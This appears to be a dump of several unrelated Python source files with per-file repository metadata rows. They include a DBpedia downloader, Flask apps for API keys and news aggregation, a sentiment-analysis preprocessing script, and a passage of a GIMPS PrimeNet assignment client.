filepath = _get_dbpedia_abstracts_filepath(lang_code, dbpedia_resources_dir)
if not os.path.exists(filepath):
logger.info("downloading dbpedia abstracts, this may take a while ... ")
url = _get_dbpedia_download_url(lang_code)
with urllib.request.urlopen(url) as request, open(filepath, 'wb') as file: # nosec
shutil.copyfileobj(request, file)
def read_dbpedia_abstracts(lang_code: str, limit=None, filepath: str = None) -> Iterator[str]:
"""Return an iteator of dbpedia abstracts.
Parameters
----------
lang_code: str
The language code of DBpedia resources to load.
limit: int | None
The maximum number of abstracts to return. Returns all abstracts if None.
filepath: str | None
The path to the dbpedia abstracts resource file. Is set automatically relative to the
`<resources_dir>/dbpedia/` directory if set to None.
File will be downloaded unless it already exists.
Returns
-------
Iterator[str]
Each abstract as string.
"""
_download_dbpedia_abstracts(lang_code, filepath)
line_pattern_str = r"^<([^>]+)> <http://www.w3.org/2000/01/rdf-schema#comment> \"(.*)\"@" + lang_code + r" .$"
line_pattern = re.compile(line_pattern_str)
n_abstracts = 0
with bz2.open(_get_dbpedia_abstracts_filepath(lang_code), "rt", encoding="utf-8") as file:
while True:
line = file.readline()
if not line:
break
if limit is not None and n_abstracts > limit:
break
line_match = line_pattern.match(line)
if line_match:
abstract = line_match.group(2).replace("\\", "")
n_abstracts += 1
yield abstract
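# Usage sketch (not part of the original module); the language code and
# limit are illustrative:
#   for abstract in read_dbpedia_abstracts("en", limit=100):
#       print(abstract[:80])
# Each line matched by line_pattern in the bz2-compressed .ttl dump has this
# shape (hypothetical resource):
#   <http://dbpedia.org/resource/Example> <http://www.w3.org/2000/01/rdf-schema#comment> "An example."@en .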
| 34.297619 | 114 | 0.681708 | 381 | 2,881 | 4.931759 | 0.330709 | 0.089409 | 0.091006 | 0.043108 | 0.292709 | 0.22512 | 0.175625 | 0.175625 | 0.1405 | 0.083023 | 0 | 0.010218 | 0.218674 | 2,881 | 83 | 115 | 34.710843 | 0.824522 | 0.199236 | 0 | 0.133333 | 0 | 0.044444 | 0.135631 | 0.03581 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.2 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8aed8943e8306c7fac13a1b0dbc48bd894fc3f | 925 | py | Python | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | from flask_restful import marshal, reqparse, Resource
from app.apiv2.marshal import api_key_fields
from app.constants import API_ENVELOPE
from app.models import ApiKey
from app.apiv2.decorators import permission_self
class ApiKeysApi(Resource):
method_decorators = [permission_self]
def get(self, user_id):
apikeys = ApiKey.query.filter_by(user_id=user_id).all()
return {
API_ENVELOPE:
[marshal(apikey, api_key_fields) for apikey in apikeys]
}
def post(self, user_id):
parser = reqparse.RequestParser()
parser.add_argument("name", type=str, required=True)
parameters = parser.parse_args(strict=True)
# This function handles all the db logic
plaintext_key = ApiKey.generate_key(user_id, parameters.get("name"))
# NOTE - this is the ONLY time the key will be in plaintext
return {"key": plaintext_key}
| 29.83871 | 76 | 0.692973 | 122 | 925 | 5.081967 | 0.508197 | 0.048387 | 0.03871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002793 | 0.225946 | 925 | 30 | 77 | 30.833333 | 0.863128 | 0.103784 | 0 | 0 | 0 | 0 | 0.013317 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8c29439c9dfeb27b8518c84b1e929c57b7ee9e | 502 | py | Python | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 11 | 2020-07-28T21:35:26.000Z | 2022-01-25T17:31:39.000Z | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 112 | 2020-07-29T15:25:33.000Z | 2022-03-31T19:21:00.000Z | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 22 | 2020-07-28T20:08:12.000Z | 2022-03-08T21:22:03.000Z |
# Copyright 2020, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Module for mimicking an ARMA data structure
"""
import numpy as np
def run(raven, raven_dict):
"""
Makes ARMA-like data structure, same guy every time.
@ In, raven, object, RAVEN variables object
@ In, raven_dict, dict, additional RAVEN information
@ Out, None
"""
# take some time working hard
for i in range(int(1e5)):
x = 2**i
# result
raven.NPV = np.random.rand()
raven.time_delta = 3.14159
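# Standalone sketch (illustration only; RAVEN normally supplies the objects):
#   class _Raven(object):
#       pass
#   r = _Raven()
#   run(r, {})
#   # r.NPV is now a uniform random float in [0, 1); r.time_delta == 3.14159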
| 19.307692 | 56 | 0.667331 | 72 | 502 | 4.611111 | 0.736111 | 0.054217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033592 | 0.229084 | 502 | 25 | 57 | 20.08 | 0.824289 | 0.593626 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8d84cf6d9b97e46819336d81f9b391abf36f90 | 1,565 | py | Python | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | 4 | 2019-04-08T00:54:14.000Z | 2021-09-19T19:22:57.000Z | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | null | null | null | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | 3 | 2019-04-08T00:54:16.000Z | 2022-02-09T22:06:15.000Z | from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
import pickle
CATEGORY = {"positive": 1, "negative": 0}
CATEGORY_INVERSED = {1: "positive", 0: "negative"}
def load_data():
"""Loads review data and returns:
X_train: reviews for training set
X_test: reviews for testing set
y_train: labels for training set
y_test: labels for testing set
count_vector: CountVectorizer object that fits training data,
it is just a matrix of word (token) counts"""
# read reviews
with open("data/reviews.txt") as f:
reviews = f.readlines()
reviews = [ review.strip() for review in reviews ]
# read its corresponding labels
with open("data/labels.txt") as f:
labels = f.readlines()
labels = [ CATEGORY[label.strip()] for label in labels ]
# split data to test and train
# 85% train 15% test
X_train, X_test, y_train, y_test = train_test_split(reviews, labels, test_size=0.15)
# print(X_train[5])
# to count words of each row ( each review )
# more at https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html#sklearn.feature_extraction.text.CountVectorizer
count_vector = CountVectorizer()
X_train = count_vector.fit_transform(X_train)
X_test = count_vector.transform(X_test)
print("Saving counting vector...")
pickle.dump(count_vector, open("results/count_vector.pickle", "wb"))
return X_train, X_test, y_train, y_test | 35.568182 | 164 | 0.699042 | 218 | 1,565 | 4.857798 | 0.399083 | 0.033994 | 0.067989 | 0.07932 | 0.122757 | 0.041549 | 0.041549 | 0.041549 | 0 | 0 | 0 | 0.009623 | 0.203195 | 1,565 | 44 | 165 | 35.568182 | 0.839615 | 0.372524 | 0 | 0 | 0 | 0 | 0.126898 | 0.029284 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
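# Downstream sketch (not in the original file): the returned matrices feed
# directly into a scikit-learn classifier; naive Bayes is a natural choice
# given the repository name, but any estimator accepting sparse input works:
#   from sklearn.naive_bayes import MultinomialNB
#   X_train, X_test, y_train, y_test = load_data()
#   model = MultinomialNB().fit(X_train, y_train)
#   print(model.score(X_test, y_test))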
ad8e4f71024e8e3d341b221f12c5dc2d0e5e43ed | 2,129 | py | Python | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, flash
from random import shuffle
import sqlite3
app = Flask(__name__)
@app.route("/")
def index():
"""Landing page with all the scraped news articles"""
# Get articles and random quote by calling their respective functions
articles = lookup_articles()
quote = get_quote()
return render_template("index.html", quote=quote, articles=articles)
@app.route("/about")
def about():
"""About page with basic information about the app"""
return render_template("about.html")
@app.route("/search")
def search():
"""Search results page with filtered content"""
keyword = request.args.get("q")
all_articles = lookup_articles()
filtered_articles = []
# Iterate through all articles and check if keyword is in the title
for article in all_articles:
title = article["title"]
# Compare keyword to each word in the article's title
if keyword in title.split() or keyword.capitalize() in title.split():
filtered_articles.append(article)
return render_template("search.html",
num_of_articles=len(filtered_articles),
keyword=keyword,
articles=filtered_articles)
def lookup_articles():
"""Looks up articles from the database"""
# Connect to SQLite database
conn = sqlite3.connect("aggregator.db")
c = conn.cursor()
articles = []
# Add each article as a dictionary to the articles list
for article in c.execute("SELECT link, image, title FROM articles"):
articles.append({"link": article[0],
"image": article[1],
"title": article[2]})
shuffle(articles)
return articles
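# Shape sketch (not in the original): lookup_articles() returns a shuffled
# list of dicts, one per database row, e.g. (values hypothetical):
#   [{'link': 'https://example.com/story', 'image': 'dog.jpg',
#     'title': 'Shelter finds homes for 100 dogs'}]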
def get_quote():
"""Returns a random quote to be displayed on the page"""
# Connect to SQLite database
conn = sqlite3.connect("aggregator.db")
c = conn.cursor()
# Get a random quote from the database and return it
for quote in c.execute("SELECT quote FROM quotes ORDER BY RANDOM() LIMIT 1"):
return quote[0]
| 27.294872 | 81 | 0.643964 | 265 | 2,129 | 5.09434 | 0.358491 | 0.041481 | 0.044444 | 0.034074 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0 | 0.005054 | 0.256458 | 2,129 | 77 | 82 | 27.649351 | 0.847757 | 0.267731 | 0 | 0.1 | 0 | 0 | 0.117878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.075 | 0 | 0.325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8fc5738e7a66bd8c364a796802538e483498f5 | 58,405 | py | Python | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Automatic assignment handler for Mlucas and CUDALucas.
[*] Revised by Teal Dulcet and Daniel Connelly for CUDALucas (2020)
Original Authorship(s):
* # EWM: adapted from https://github.com/MarkRose/primetools/blob/master/mfloop.py
by teknohog and Mark Rose, with help from Gord Palameta.
* # 2020: support for computer registration and assignment-progress via
direct Primenet-v5-API calls by Loïc Le Loarer <loic@le-loarer.org>
[*] List of supported v5 operations:
* Update Computer Info (Register Assignment) (Credit: Loarer)
* Program Options (po) (Credit: Connelly)
* Get Assignment (ga, primenet_fetch) (Credit: Connelly & Loarer)
* Register Assignment (ra) (Credit: Connelly) NOTE: DONE; not used
* Assignment Un-Reserve (au) (Credit: Connelly) NOTE: Done, not used
* Assignment Progress (ap,update_progress) (Credit: Loarer)
* Assignment Result (ar,submit_one_line_v5) (Credit: Loarer)
'''
################################################################################
# #
# (C) 2017-2020 by Daniel Connelly and Teal Dulcet. #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the #
# Free Software Foundation; either version 2 of the License, or (at your #
# option) any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; see the file GPL.txt. If not, you may view one at #
# http://www.fsf.org/licenses/licenses.html, or obtain one by writing to the #
# Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA #
# 02111-1307, USA. #
# #
################################################################################
from __future__ import division, print_function
import subprocess
from random import getrandbits
from collections import namedtuple
import sys
import os.path
import re
import time
import optparse
from hashlib import sha256
import json
import platform
import logging
try:
import requests
except ImportError:
print("Installing requests as dependency")
subprocess.check_output("pip install requests", shell=True)
print("The Requests library has been installed. Please run the program again")
sys.exit(0)
try:
# Python3
from urllib.parse import urlencode
from requests.exceptions import ConnectionError, HTTPError
except ImportError:
# Python2
from urllib import urlencode
from urllib2 import URLError as ConnectionError
from urllib2 import HTTPError
try:
from configparser import ConfigParser, Error as ConfigParserError
except ImportError:
from ConfigParser import ConfigParser, Error as ConfigParserError # ver. < 3.0
if sys.version_info[:2] >= (3, 7):
# It is OK to use dict in 3.7+ because insertion order is guaranteed to be preserved
# Since it is also faster, it is better to use raw dict()
OrderedDict = dict
else:
try:
from collections import OrderedDict
except ImportError:
# For python2.6 and before which don't have OrderedDict
try:
from ordereddict import OrderedDict
except ImportError:
# Tests will not work correctly but it doesn't affect the functionality
OrderedDict = dict
s = requests.Session() # session that maintains our cookies
# [***] Daniel Connelly's functions
# get assignment
def ga(guid):
args = primenet_v5_bargs.copy()
args["t"] = "ga" # transaction type
args["g"] = guid
args["c"] = options.cpu
args["a"] = ""
return args
# register assignment
def ra(n):
'''Note: this function is not used'''
args = primenet_v5_bargs.copy()
args["t"] = "ra"
args["g"] = get_guid(config)
args["c"] = options.cpu
args["b"] = 2
args["n"] = n
args["w"] = options.worktype
return args
# unreserve assignment
def au(k):
args = primenet_v5_bargs.copy()
args["t"] = "au"
args["g"] = get_guid(config)
args["k"] = k
return args
# TODO -- have people set their own program options for commented out portions
def program_options(guid):
args = primenet_v5_bargs.copy()
args["t"] = "po"
args["g"] = guid
args["c"] = "" # no value updates all cpu threads with given worktype
args["w"] = options.worktype if config.has_option("primenet", "first_time") is False \
or hasattr(opts_no_defaults, "worktype") else ""
# args["nw"] = 1
# args["Priority"] = 1
args["DaysOfWork"] = options.days_work if config.has_option("primenet", "first_time") is False \
or hasattr(opts_no_defaults, "days_work") else ""
# args["DayMemory"] = 8
# args["NightMemory"] = 8
# args["DayStartTime"] = 0
# args["NightStartTime"] = 0
# args["RunOnBattery"] = 1
result = send_request(guid, args)
config_updated = False
if result is None or int(result["pnErrorResult"]) != 0:
parser.error("Error while setting program options on mersenne.org")
if "w" in result:
config.set("primenet", "worktype", result["w"])
config_updated = True
if "DaysOfWork" in result:
config.set("primenet", "days_work", result["DaysOfWork"])
config_updated = True
if config.has_option("primenet", "first_time") is False:
config.set("primenet", "first_time", "false")
config_updated = True
if "w" in result or "DaysOfWork" in result:
merge_config_and_options(config, options)
if config_updated:
config_write(config)
def unreserve_all(guid):
if guid is None:
debug_print("Cannot unreserve, the registration is not done",
file=sys.stderr)
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
for task in tasks:
assignment = get_progress_assignment(task)
args = au(assignment.id)
result = send_request(guid, args)
if result is None or int(result["pnErrorResult"]) != 0:
debug_print("ERROR while releasing assignment on mersenne.org: assignment_id={0}".format(
assignment.id), file=sys.stderr)
# TODO: Delete task from workfile
def return_code(result, aid):
'''Check if the return code is not OKAY and do something about it
@param result - return from send_request()
@param aid - assignment ID the result belongs to
'''
rc = int(result["pnErrorResult"])
if rc == primenet_api.ERROR_OK:
debug_print(
"Result correctly send to server: assignment_id={0}".format(aid))
return True
else: # non zero ERROR code
debug_print("ERROR while submitting result on mersenne.org: assignment_id={0}".format(
aid), file=sys.stderr)
if rc == primenet_api.ERROR_UNREGISTERED_CPU:  # compare ints with ==; "is" only works for small interned ints
# should register again and retry
debug_print(
"ERROR UNREGISTERED CPU: Please remove the guid line from local.ini, rerun to re-register, and retry", file=sys.stderr)
return False
elif rc == primenet_api.ERROR_INVALID_PARAMETER:
debug_print(
"INVALID PARAMETER: this is a bug in the script, please create an issue: https://github.com/tdulcet/Distributed-Computing-Scripts/issues", file=sys.stderr)
return False
else:
# In all other error case, the submission must not be retried
return True
def get_cpu_signature():
output = ""
if platform.system() == "Windows":
output = subprocess.check_output('wmic cpu list brief').decode()
elif platform.system() == "Darwin":
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
command = "sysctl -n machdep.cpu.brand_string"
output = subprocess.check_output(command).decode().strip()
elif platform.system() == "Linux":
with open('/proc/cpuinfo', 'r') as f1:
all_info = f1.read()
for line in all_info.split("\n"):
if "model name" in line:
output = re.sub(".*model name.*:", "", line, 1).lstrip()
break
return output
def get_cpu_name(signature):
'''Note: Not used'''
search = re.search(
r'\bPHENOM\b|\bAMD\b|\bATOM\b|\bCore 2\b|\bCore(TM)2\b|\bCORE(TM) i7\b|\bPentium(R) M\b|\bCore\b|\bIntel\b|\bUnknown\b|\bK5\b|\bK6\b', signature)
return search.group(0) if search else ""
cpu_signature = get_cpu_signature()
cpu_brand = get_cpu_name(cpu_signature)
# END Daniel's Functions
primenet_v5_burl = "http://v5.mersenne.org/v5server/?"
PRIMENET_TRANSACTION_API_VERSION = 0.95
VERSION = 19
primenet_v5_bargs = OrderedDict(
(("px", "GIMPS"), ("v", PRIMENET_TRANSACTION_API_VERSION)))
primenet_baseurl = "https://www.mersenne.org/"
primenet_login = False
class primenet_api:
ERROR_OK = 0
ERROR_SERVER_BUSY = 3
ERROR_INVALID_VERSION = 4
ERROR_INVALID_TRANSACTION = 5
# Returned for length, type, or character invalidations.
ERROR_INVALID_PARAMETER = 7
ERROR_ACCESS_DENIED = 9
ERROR_DATABASE_CORRUPT = 11
ERROR_DATABASE_FULL_OR_BROKEN = 13
# Account related errors:
ERROR_INVALID_USER = 21
# Computer cpu/software info related errors:
ERROR_UNREGISTERED_CPU = 30
ERROR_OBSOLETE_CLIENT = 31
ERROR_STALE_CPU_INFO = 32
ERROR_CPU_IDENTITY_MISMATCH = 33
ERROR_CPU_CONFIGURATION_MISMATCH = 34
# Work assignment related errors:
ERROR_NO_ASSIGNMENT = 40
ERROR_INVALID_ASSIGNMENT_KEY = 43
ERROR_INVALID_ASSIGNMENT_TYPE = 44
ERROR_INVALID_RESULT_TYPE = 45
ERROR_INVALID_WORK_TYPE = 46
ERROR_WORK_NO_LONGER_NEEDED = 47
PRIMENET_AR_NO_RESULT = 0 # No result, just sending done msg
PRIMENET_AR_TF_FACTOR = 1 # Trial factoring, factor found
PRIMENET_AR_P1_FACTOR = 2 # P-1, factor found
PRIMENET_AR_ECM_FACTOR = 3 # ECM, factor found
PRIMENET_AR_TF_NOFACTOR = 4 # Trial Factoring no factor found
PRIMENET_AR_P1_NOFACTOR = 5 # P-1 Factoring no factor found
PRIMENET_AR_ECM_NOFACTOR = 6 # ECM Factoring no factor found
PRIMENET_AR_LL_RESULT = 100 # LL result, not prime
PRIMENET_AR_LL_PRIME = 101 # LL result, Mersenne prime
PRIMENET_AR_PRP_RESULT = 150 # PRP result, not prime
PRIMENET_AR_PRP_PRIME = 151 # PRP result, probably prime
# Teal's addition
errors = {primenet_api.ERROR_SERVER_BUSY: "Server busy",
primenet_api.ERROR_INVALID_VERSION: "Invalid version",
primenet_api.ERROR_INVALID_TRANSACTION: "Invalid transaction",
primenet_api.ERROR_INVALID_PARAMETER: "Invalid parameter",
primenet_api.ERROR_ACCESS_DENIED: "Access denied",
primenet_api.ERROR_DATABASE_CORRUPT: "Server database malfunction",
primenet_api.ERROR_DATABASE_FULL_OR_BROKEN: "Server database full or broken",
primenet_api.ERROR_INVALID_USER: "Invalid user",
primenet_api.ERROR_UNREGISTERED_CPU: "CPU not registered",
primenet_api.ERROR_OBSOLETE_CLIENT: "Obsolete client, please upgrade",
primenet_api.ERROR_STALE_CPU_INFO: "Stale cpu info",
primenet_api.ERROR_CPU_IDENTITY_MISMATCH: "CPU identity mismatch",
primenet_api.ERROR_CPU_CONFIGURATION_MISMATCH: "CPU configuration mismatch",
primenet_api.ERROR_NO_ASSIGNMENT: "No assignment",
primenet_api.ERROR_INVALID_ASSIGNMENT_KEY: "Invalid assignment key",
primenet_api.ERROR_INVALID_ASSIGNMENT_TYPE: "Invalid assignment type",
primenet_api.ERROR_INVALID_RESULT_TYPE: "Invalid result type"}
def debug_print(text, file=sys.stdout):
if options.debug or file == sys.stderr:
caller_name = sys._getframe(1).f_code.co_name
if caller_name == '<module>':
caller_name = 'main loop'
caller_string = caller_name + ": "
print(progname + ": " + caller_string + " " + time.strftime("%Y-%m-%d %H:%M") +
" \t" + str(text), file=file)
file.flush()
def greplike(pattern, lines):
output = []
for line in lines:
s = pattern.search(line)
if s:
output.append(s.group(0))
return output
def num_to_fetch(line, targetsize):
num_existing = len(line)
num_needed = targetsize - num_existing
return max(num_needed, 0)
def readonly_list_file(filename, mode="r"):
# Used when there is no intention to write the file back, so don't
# check or write lockfiles. Returns a list of right-stripped lines.
try:
with open(filename, mode=mode) as File:
contents = File.readlines()
return [x.rstrip() for x in contents]
except (IOError, OSError):
return []
def write_list_file(filename, line, mode="w"):
# A "null append" is meaningful, as we can call this to clear the
# lockfile. In this case the main file need not be touched.
if not ("a" in mode and len(line) == 0):
newline = b'\n' if 'b' in mode else '\n'
content = newline.join(line) + newline
with open(filename, mode) as File:
File.write(content)
def primenet_fetch(num_to_get):
if not options.username:
return []
# As of early 2018, here is the full list of assignment-type codes supported by the Primenet server; Mlucas
# v18 (and thus this script) supports only the subset of these indicated by an asterisk in the left column.
# Supported assignment types may be specified via either their PrimeNet number code or the listed Mnemonic:
# Worktype:
# Code Mnemonic Description
# ---- ----------------- -----------------------
# 0 Whatever makes the most sense
# 1 Trial factoring to low limits
# 2 Trial factoring
# 4 P-1 factoring
# 5 ECM for first factor on Mersenne numbers
# 6 ECM on Fermat numbers
# 8 ECM on mersenne cofactors
# *100 SmallestAvail Smallest available first-time tests
# *101 DoubleCheck Double-checking
# *102 WorldRecord World record primality tests
# *104 100Mdigit 100M digit number to LL test (not recommended)
# *150 SmallestAvailPRP First time PRP tests (Gerbicz)
# *151 DoubleCheckPRP Doublecheck PRP tests (Gerbicz)
# *152 WorldRecordPRP World record sized numbers to PRP test (Gerbicz)
# *153 100MdigitPRP 100M digit number to PRP test (Gerbicz)
# 160 PRP on Mersenne cofactors
# 161 PRP double-checks on Mersenne cofactors
# Convert mnemonic-form worktypes to corresponding numeric value, check worktype value vs supported ones:
option_dict = {"SmallestAvail": "100", "DoubleCheck": "101", "WorldRecord": "102", "100Mdigit": "104",
"SmallestAvailPRP": "150", "DoubleCheckPRP": "151", "WorldRecordPRP": "152", "100MdigitPRP": "153"}
if options.worktype in option_dict: # this and the above line of code enable us to use words or numbers on the cmdline
options.worktype = option_dict[options.worktype]
supported = set(['100', '101', '102', '104', '150', '151', '152', '153']
) if program == "MLucas" else set(['100', '101', '102', '104'])
if options.worktype not in supported:
debug_print("Unsupported/unrecognized worktype = " +
options.worktype + " for " + program)
return []
try:
# Get assignment (Loarer's way)
if options.password:
assignment = OrderedDict((
("cores", "1"),
("num_to_get", num_to_get),
("pref", options.worktype),
("exp_lo", ""),
("exp_hi", ""),
("B1", "Get Assignments")
))
openurl = primenet_baseurl + "manual_assignment/?"
debug_print("Fetching work via URL = " +
openurl + urlencode(assignment))
r = s.post(openurl, data=assignment)
return greplike(workpattern, [line.decode('utf-8', 'replace') for line in r.iter_lines()])
# Get assignment using V5 API
else:
guid = get_guid(config)
assignment = ga(guid) # get assignment
debug_print("Fetching work via V5 Primenet = " +
primenet_v5_burl + urlencode(assignment))
tests = []
for _ in range(num_to_get):
r = send_request(guid, assignment)
if r is None or int(r["pnErrorResult"]) != 0:
debug_print(
"ERROR while requesting an assignment on mersenne.org", file=sys.stderr)
break
if r['w'] not in supported:
debug_print("ERROR: Returned assignment from server is not a supported worktype for " + program + ".", file=sys.stderr)
return []
# if options.worktype == LL
if r['w'] in set(['100', '102', '104']):
tests.append("Test="+",".join([r[i] for i in ['k', 'n', 'sf', 'p1']]))
# if options.worktype == DC
elif r['w'] in set(['101']):
tests.append("DoubleCheck="+",".join([r[i] for i in ['k', 'n', 'sf', 'p1']]))
# if PRP type testing, first time
elif r['w'] in set(['150', '152', '153']):
tests.append("PRP="+",".join([r[i] for i in ['k', 'b', 'n', 'c', 'sf', 'saved']]))
# if PRP-DC (probable-primality double-check) testing
elif r['w'] in set(['151']):
tests.append("PRP="+",".join([r[i] for i in ['k', 'b', 'n', 'c', 'sf', 'saved', 'base', 'rt']]))
return tests
except ConnectionError:
debug_print("URL open error at primenet_fetch")
return []
def get_assignment(progress):
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
(percent, time_left) = None, None
if progress is not None and isinstance(progress, tuple) and len(progress) == 2:
(percent, time_left) = progress # unpack update_progress output
num_cache = int(options.num_cache) + 1
if time_left is not None and time_left <= options.days_work*24*3600:
# time_left and percent increase are exclusive (don't want to do += 2)
num_cache += 1
debug_print("Time_left is {0} and smaller than limit ({1}), so num_cache is increased by one to {2}".format(
time_left, options.days_work*24*3600, num_cache))
num_to_get = num_to_fetch(tasks, num_cache)
if num_to_get < 1:
debug_print(workfile + " already has " + str(len(tasks)) +
" >= " + str(num_cache) + " entries, not getting new work")
return 0
debug_print("Fetching " + str(num_to_get) + " assignments")
new_tasks = primenet_fetch(num_to_get)
num_fetched = len(new_tasks)
if num_fetched > 0:
debug_print("Fetched {0} assignments:".format(num_fetched))
for new_task in new_tasks:
debug_print("{0}".format(new_task))
write_list_file(workfile, new_tasks, "a")
if num_fetched < num_to_get:
debug_print("Error: Failed to obtain requested number of new assignments, " +
str(num_to_get) + " requested, " + str(num_fetched) + " successfully retrieved")
return num_fetched
resultpattern = re.compile("[Pp]rogram|CUDALucas")
def mersenne_find(line, complete=True):
# Pre-v19 old-style HRF-formatted result used "Program:..."; starting w/v19 JSON-formatted result uses "program",
return resultpattern.search(line)
try:
from statistics import median_low
except ImportError:
def median_low(mylist):
sorts = sorted(mylist)
length = len(sorts)
return sorts[(length-1)//2]
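# Worked examples for the fallback (matching statistics.median_low):
#   median_low([5, 3, 1, 4, 2])  # sorted -> [1, 2, 3, 4, 5], index (5-1)//2 = 2 -> 3
#   median_low([4, 3, 1, 2])     # sorted -> [1, 2, 3, 4],    index (4-1)//2 = 1 -> 2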
def parse_stat_file(p):
statfile = 'p' + str(p) + '.stat'
if not os.path.exists(statfile):
print("ERROR: stat file does not exist")
return 0, None
w = readonly_list_file(statfile) # appended line by line, no lock needed
found = 0
regex = re.compile("Iter# = (.+?) .*?(\d+\.\d+) (m?sec)/iter")
list_usec_per_iter = []
# get the 5 most recent Iter line
for line in reversed(w):
res = regex.search(line)
if res:
found += 1
# keep the last iteration to compute the percent of progress
if found == 1:
iteration = int(res.group(1))
usec_per_iter = float(res.group(2))
unit = res.group(3)
if unit == "sec":
usec_per_iter *= 1000
list_usec_per_iter.append(usec_per_iter)
if found == 5:
break
if found == 0:
return 0, None # iteration is 0, but don't know the estimated speed yet
# take the median of the last grepped lines
usec_per_iter = median_low(list_usec_per_iter)
return iteration, usec_per_iter
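# A .stat line this parser accepts looks roughly like the following
# (hypothetical values; only the "Iter# = <n>" and "<x.y> msec/iter"
# fields matter to the regex):
#   Iter# = 1000000 [ 5.00% complete] clocks = 00:01:23.456 [ 5.23 msec/iter]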
def parse_v5_resp(r):
ans = dict()
for line in r.splitlines():
if line == "==END==":
break
option, _, value = line.partition("=")
ans[option] = value
return ans
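# Example (hypothetical server payload):
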